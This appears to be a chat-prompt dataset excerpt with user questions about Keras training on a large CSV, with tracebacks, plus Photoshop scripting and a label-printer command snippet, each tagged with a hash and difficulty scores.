--> 503 return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\construction.py:152, in arrays_to_mgr(arrays, columns, index, dtype, verify_integrity, typ, consolidate)
149 axes = [columns, index]
151 if typ == \"block\":
--> 152 return create_block_manager_from_column_arrays(
153 arrays, axes, consolidate=consolidate, refs=refs
154 )
155 elif typ == \"array\":
156 return ArrayManager(arrays, [index, columns])
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2144, in create_block_manager_from_column_arrays(arrays, axes, consolidate, refs)
2142 raise_construction_error(len(arrays), arrays[0].shape, axes, e)
2143 if consolidate:
-> 2144 mgr._consolidate_inplace()
2145 return mgr
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:1788, in BlockManager._consolidate_inplace(self)
1782 def _consolidate_inplace(self) -> None:
1783 # In general, _consolidate_inplace should only be called via
1784 # DataFrame._consolidate_inplace, otherwise we will fail to invalidate
1785 # the DataFrame's _item_cache. The exception is for newly-created
1786 # BlockManager objects not yet attached to a DataFrame.
1787 if not self.is_consolidated():
-> 1788 self.blocks = _consolidate(self.blocks)
1789 self._is_consolidated = True
1790 self._known_consolidated = True
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2269, in _consolidate(blocks)
2267 new_blocks: list[Block] = []
2268 for (_can_consolidate, dtype), group_blocks in grouper:
-> 2269 merged_blocks, _ = _merge_blocks(
2270 list(group_blocks), dtype=dtype, can_consolidate=_can_consolidate
2271 )
2272 new_blocks = extend_blocks(merged_blocks, new_blocks)
2273 return tuple(new_blocks)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\managers.py:2301, in _merge_blocks(blocks, dtype, can_consolidate)
2298 new_values = bvals2[0]._concat_same_type(bvals2, axis=0)
2300 argsort = np.argsort(new_mgr_locs)
-> 2301 new_values = new_values[argsort]
2302 new_mgr_locs = new_mgr_locs[argsort]
2304 bp = BlockPlacement(new_mgr_locs)
MemoryError: Unable to allocate 13.7 GiB for an array with shape (6317, 290138) and data type float64"
}
|
1e25409d6cdaf3595f3e0a8a8491bdd7
|
{
"intermediate": 0.4779605269432068,
"beginner": 0.324287474155426,
"expert": 0.1977519690990448
}
|
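The MemoryError means the fully materialised frame (about 13.7 GiB for a single block alone) does not fit in RAM. The standard levers are chunked reading, loading only the columns you need, and narrower dtypes; a minimal sketch, where process is a hypothetical placeholder for your per-chunk work:

import pandas as pd

reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv",
                     chunksize=100_000)   # rows per chunk; tune to your RAM
for chunk in reader:
    process(chunk)                        # hypothetical per-chunk processing

# other common levers: usecols=[...] to read only the needed columns, and
# dtype="float32" for numeric columns to halve memory versus float64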
46,760
|
hello
|
cef37ab84704158b206902ce90358bb8
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
46,761
|
I want to train a NN model on my dataset, which is a 27 GB CSV file.
I can't read it with df = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv") because it raises an error due to the file's size.
Give me proper code to train a model on my dataset.
|
727d3094fe95f2128c62437577716804
|
{
"intermediate": 0.2399674355983734,
"beginner": 0.06087492033839226,
"expert": 0.6991576552391052
}
|
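One Keras-native way to avoid loading the file at all is to stream batches with tf.data; make_csv_dataset reads, parses, and batches lazily. A sketch - label_name takes a single target column, and "y_High_1d" is only an example borrowed from the neighbouring rows; the model must accept the dict of feature columns this dataset yields:

import tensorflow as tf

dataset = tf.data.experimental.make_csv_dataset(
    r"C:\Users\arisa\Desktop\combined_day.csv",
    batch_size=72,
    label_name="y_High_1d",   # example target column, not a confirmed name
    num_epochs=1,
    shuffle=False,
)
# model.fit(dataset, epochs=10)  # assuming a model keyed to the feature columns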
46,762
|
my code:
# %%
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled.iloc[i:i+batch_size]
y_batch = Y_scaled[i:i+batch_size]
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "ValueError",
"message": "Input 0 of layer \"functional_9\" is incompatible with the layer: expected shape=(None, 72, 6427), found shape=(None, 6427)",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[25], line 5
1 model = build_model()
3 # history = model.fit(X_train, y_train, epochs=20, batch_size=64,
4 # validation_data=(X_dev, y_dev))
----> 5 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\input_spec.py:245, in assert_input_compatibility(input_spec, inputs, layer_name)
243 if spec_dim is not None and dim is not None:
244 if spec_dim != dim:
--> 245 raise ValueError(
246 f'Input {input_index} of layer \"{layer_name}\" is '
247 \"incompatible with the layer: \"
248 f\"expected shape={spec.shape}, \"
249 f\"found shape={shape}\"
250 )
ValueError: Input 0 of layer \"functional_9\" is incompatible with the layer: expected shape=(None, 72, 6427), found shape=(None, 6427)"
}
|
0f47d2f487ff6eac7c1ac68ec929f034
|
{
"intermediate": 0.3507901728153229,
"beginner": 0.4262188971042633,
"expert": 0.222990944981575
}
|
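The mismatch is exactly what the message states: the generator yields 2-D batches of shape (batch, 6427), while Input(shape=(72, 6427)) declares a 3-D input of (batch, 72, 6427). Since 72 is the batch size, not a per-sample axis, dropping it fixes the error; a one-line sketch of the change:

input_shape = (6427,)   # per-sample feature vector; Keras adds the batch axis itself
inputs = Input(shape=input_shape)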
46,763
|
What is this code and what does it do?
U1 setvar "device.languages" "zpl"
N
ZB
S3
D10
R02,0
q240
Q160,120
A05,135,3,2,1,1,N,""
B30,10,0,1C,2,7,75,B,"9930348263"
I8,C,001
A30,118,0,1,1,1,N,""
A20,137,0,1,1,1,N,""
P1
|
020fb1bad9d99562ca5dfc778f10ec61
|
{
"intermediate": 0.37532463669776917,
"beginner": 0.45593997836112976,
"expert": 0.16873544454574585
}
|
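The snippet is a Zebra label job: one SGD command followed by EPL2 commands that print a single small label carrying a Code 128 barcode. An annotated reading, assuming standard EPL2 semantics (in EPL2, a line starting with ';' is a comment); note the oddity that the first line switches the printer language to ZPL even though everything after it is EPL2:

U1 setvar "device.languages" "zpl"  ; SGD command: set printer language to ZPL
N                                   ; clear the image buffer
ZB                                  ; print direction: bottom of buffer first
S3                                  ; print speed 3
D10                                 ; print density (darkness) 10
R02,0                               ; reference point at x=2, y=0 dots
q240                                ; label width 240 dots
Q160,120                            ; label length 160 dots, gap/sensor value 120
A05,135,3,2,1,1,N,""                ; rotated ASCII text field, here with empty data
B30,10,0,1C,2,7,75,B,"9930348263"   ; Code 128 (subset C) barcode, height 75 dots,
                                    ;   with human-readable text ("B")
I8,C,001                            ; character set selection
A30,118,0,1,1,1,N,""                ; empty text field
A20,137,0,1,1,1,N,""                ; empty text field
P1                                  ; print one label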
46,764
|
code:
# %%
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled.iloc[i:i+batch_size]
y_batch = Y_scaled[i:i+batch_size]
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (6427,)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "AttributeError",
"message": "'numpy.ndarray' object has no attribute 'iloc'",
"stack": "---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[35], line 3
1 model = build_model()
----> 3 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
Cell In[34], line 21, in data_generator()
19 # Yield batches
20 for i in range(0, len(X_scaled), batch_size):
---> 21 X_batch = X_scaled.iloc[i:i+batch_size]
22 y_batch = Y_scaled[i:i+batch_size]
23 yield np.array(X_batch), np.array(y_batch)
AttributeError: 'numpy.ndarray' object has no attribute 'iloc'"
}
|
581b7153f4c34ccd3c8056082fdf8197
|
{
"intermediate": 0.41099169850349426,
"beginner": 0.38303688168525696,
"expert": 0.205971360206604
}
|
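StandardScaler.fit_transform returns plain NumPy arrays, and .iloc exists only on pandas objects, so the arrays must be indexed directly. (Two side notes: fitting a fresh scaler per chunk gives each chunk a different scaling, and scaling the binary priority targets before binary cross-entropy is likely unintended.) A sketch of the fix:

# NumPy arrays are sliced directly; .iloc is pandas-only
X_batch = X_scaled[i:i + batch_size]
y_batch = Y_scaled[i:i + batch_size]
yield X_batch, y_batch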
46,765
|
Hi
|
a4ad38fbe481fc2b7d8bd899219a3b2f
|
{
"intermediate": 0.33010533452033997,
"beginner": 0.26984941959381104,
"expert": 0.400045245885849
}
|
46,766
|
I need to open a URL with Chrome using Photoshop scripting. How can I do that?
|
d1061613ab0e8ffed7822ee2b41d8cd8
|
{
"intermediate": 0.43724194169044495,
"beginner": 0.26135408878326416,
"expert": 0.3014039695262909
}
|
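Photoshop's ExtendScript has no direct "open in Chrome" call; a common portable trick is to write an internet-shortcut file and execute it, which opens the system default browser. A sketch with a placeholder URL - forcing Chrome specifically would instead require launching the OS's Chrome executable via a shell command:

// ExtendScript (Photoshop)
var shortcut = new File(Folder.temp + "/openpage.url");
shortcut.open("w");
shortcut.writeln("[InternetShortcut]");
shortcut.writeln("URL=https://example.com");  // placeholder URL
shortcut.close();
shortcut.execute();  // opens in the default browser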
46,767
|
code:
# %%
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.preprocessing import StandardScaler
# %%
import pandas as pd
chunk_size = 10000 # This depends on your available memory
batch_size = 72
# %%
def data_generator():
reader = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv", chunksize=chunk_size)
for chunk in reader:
X = chunk.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
Y = chunk[['y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d']].values
xScaler = StandardScaler()
yScaler = StandardScaler()
X_scaled = xScaler.fit_transform(X)
Y_scaled = yScaler.fit_transform(Y)
# Yield batches
for i in range(0, len(X_scaled), batch_size):
X_batch = X_scaled[i:i+batch_size]
y_batch = {
'high_output_1d': Y_scaled[i:i + batch_size, 0],
'low_output_1d': Y_scaled[i:i + batch_size, 1],
'priority_output_1d': Y_scaled[i:i + batch_size, 2],
'high_output_2d': Y_scaled[i:i + batch_size, 3],
'low_output_2d': Y_scaled[i:i + batch_size, 4],
'priority_output_2d': Y_scaled[i:i + batch_size, 5],
'high_output_3d': Y_scaled[i:i + batch_size, 6],
'low_output_3d': Y_scaled[i:i + batch_size, 7],
'priority_output_3d': Y_scaled[i:i + batch_size, 8],
'high_output_5d': Y_scaled[i:i + batch_size, 9],
'low_output_5d': Y_scaled[i:i + batch_size, 10],
'priority_output_5d': Y_scaled[i:i + batch_size, 11],
}
yield np.array(X_batch), np.array(y_batch)
# %%
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, Dropout
def build_model():
input_shape = (6427,)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
return model
# %%
model = build_model()
history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
error:
{
"name": "ValueError",
"message": "When passing a dataset to a Keras model, the arrays must be at least rank 1. Received: {'high_output_1d': array([ 8.79217299e+00, 8.84339892e-01, 7.55902042e-01, 1.11906540e-01,
-2.26649447e-02, -4.11701868e-01, -5.68778841e-01, 5.85432460e-01,
-5.02327334e-01, 1.52637873e+00, 2.23464977e+00, 2.29235950e-01,
1.50940229e+00, -5.23579976e-01, -4.16326501e-01, 4.92877190e-02,
5.42060489e-02, 3.12979719e-01, 1.40941909e-01, -4.95542371e-03,
1.96429079e-01, -5.32675319e-01, 1.02765435e+00, -2.93751310e-01,
1.92111487e+00, 9.38977297e-01, -4.44392048e-01, 6.52754685e-02,
4.67296064e+00, -2.50815330e-02, 1.56193473e+00, -5.70026099e-01,
-2.85948033e-01, 3.00088762e-01, 1.20186367e+00, 1.22634695e+00,
-3.80834498e-01, 1.00077118e+00, 1.12641743e-01, -4.37100319e-02,
1.45405367e+00, 6.49528231e-01, -5.61224631e-01, -4.32377906e-01,
-8.13504326e-02, -3.33933058e-01, -3.46453842e-01, -2.39538075e-01,
6.51959971e-01, 2.52093706e+00, -2.39324606e-01, -4.79073157e-04,
-1.70394678e-01, -5.42552270e-01, -4.43487031e-01, 1.45189491e+00,
-3.76486529e-01, 1.70622454e-01, 1.33705161e+00, 2.82900771e-01,
-3.17095428e-01, -6.55754874e-02, 1.70774551e-01, -1.04341810e-01,
3.98202705e-01, -4.68149980e-01, -5.94507569e-01, -4.16240397e-01,
-1.55905947e-01, 2.03732870e-01, -4.72319210e-01, 1.31966277e+00]), 'low_output_1d': array([ 0.62222168, 0.50641497, -0.6090518 , -0.22490433, 0.38988916,
-0.07180503, -0.47035044, 0.82141432, -1.17004721, 0.63709271,
0.53498097, -0.02723523, 0.53917205, -1.0045638 , -3.09418541,
-0.23573305, -2.10687079, -0.55468606, 0.48654386, -0.7127193 ,
-1.20487145, -1.63227043, 0.66007135, -8.21289095, -1.79706476,
-4.60779591, -1.94973754, -5.44184606, 0.52137756, -1.70102634,
0.5151494 , -1.56606524, -2.86856769, -1.21492057, -0.25423014,
0.01421622, -0.44466742, 0.45018618, 0.619783 , -1.17005953,
0.6103516 , 0.61889233, -1.75820998, -2.11729097, -0.39898939,
-1.10658574, -1.24708922, -0.59100492, 0.1219168 , 0.32716717,
0.08521251, -0.11573405, -0.72660666, -1.14529386, -0.07100378,
-0.42453936, -3.48321905, -3.22402981, -0.13042889, -0.30978229,
-1.84511656, -0.22848678, 0.41075251, -0.49965728, 0.72595419,
-0.6290018 , -0.74311692, 0.01713297, 0.35140018, 0.28823087,
-0.48991381, 0.84596564]), 'priority_output_1d': array([-1.00722611, -1.00722611, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
-1.00722611, -1.00722611, -1.00722611, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, 0.99282573, -1.00722611, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, 0.99282573, -1.00722611,
-1.00722611, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611, 0.99282573, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
0.99282573, 0.99282573, 0.99282573, 0.99282573, 0.99282573,
-1.00722611, 0.99282573, 0.99282573, -1.00722611, -1.00722611,
0.99282573, 0.99282573, -1.00722611, 0.99282573, -1.00722611,
0.99282573, 0.99282573, -1.00722611, -1.00722611, -1.00722611,
-1.00722611, -1.00722611]), 'high_output_2d': array([ 5.93195112e+00, 1.38234890e+00, 5.47186882e-01, -1.17218450e-01,
-2.10999641e-01, -4.82114627e-01, -3.49111146e-02, 2.12775865e-01,
-6.00258826e-02, 2.69754835e+00, 1.36209487e+00, 8.17323170e-01,
8.56678929e-01, -5.60081087e-01, -4.85337476e-01, 3.05186246e-01,
-1.57429203e-01, 2.29069439e-02, 2.47855747e-02, -1.98658097e-01,
-5.83157454e-02, -2.20404574e-01, 5.47992380e-01, -3.99916353e-01,
1.49107851e+00, 4.59156859e-01, -5.04896006e-01, 1.49296426e+00,
3.06132334e+00, 7.16719071e-01, 8.93288131e-01, -5.92448812e-01,
-3.94478346e-01, 3.10091035e-02, 1.77167650e+00, 6.59421187e-01,
2.47216135e-01, 5.54774159e-01, 5.19199504e-02, 5.43345110e-01,
9.98295765e-01, 2.57443410e-01, -5.86315178e-01, -4.96523500e-01,
-2.09686055e-01, -4.27918512e-01, -4.36644091e-01, 2.18096856e-01,
2.55430992e+00, 1.56160491e+00, -5.44706096e-02, -1.95538584e-01,
-3.13950652e-01, -5.73302643e-01, 3.94407937e-01, 8.16602752e-01,
-4.57573496e-01, -7.63000604e-02, 7.36569889e-01, 1.94529970e-03,
-4.16184577e-01, -3.65386694e-02, 2.37737179e-01, -8.60126399e-03,
8.22977813e-02, -5.21452613e-01, -6.09509643e-01, -2.16428747e-01,
2.45915781e-01, -5.32258238e-02, 5.66537814e-01, 8.31274632e-01]), 'low_output_2d': array([ 0.73460625, 0.64671157, -0.19990256, 0.09165671, 0.5582711 ,
-0.39642705, -0.09463135, 0.52442862, -0.67282313, 0.74589302,
0.66839252, 0.2416831 , 0.67157345, -2.66241052, -2.08606292,
-0.65998524, -1.98286003, -0.15864018, 0.08001662, -1.6989241 ,
-1.22777353, -0.97650242, -5.11315829, -5.971045 , -2.06402195,
-3.23485916, -5.0190101 , -3.86788442, 0.65806784, -1.02868661,
0.65334081, -2.39117122, -2.63411308, -0.84146959, 0.06939908,
0.27314382, -0.07513852, 0.60403519, -0.19094916, -0.62569477,
0.72559712, -0.36975717, -2.82820373, -1.34462207, -0.22531267,
-1.36886125, -1.31274648, -0.18620538, 0.35488613, 0.51066653,
0.3270284 , -0.78666465, -1.25822529, -0.71969117, -0.67043215,
-1.06784349, -4.47822764, -2.18461189, 0.16336144, -0.62637131,
-1.75632453, 0.08893772, 0.57410592, -0.11687458, 0.14413867,
-0.33238227, -0.58863737, 0.27535756, 0.52905884, 0.12669226,
-0.10947951, 0.90442287]), 'priority_output_2d': array([-1.03916644, -1.03916644, -1.03916644, 0.96230975, -1.03916644,
0.96230975, -1.03916644, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, 0.96230975, 0.96230975,
0.96230975, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, -1.03916644, 0.96230975, 0.96230975, 0.96230975,
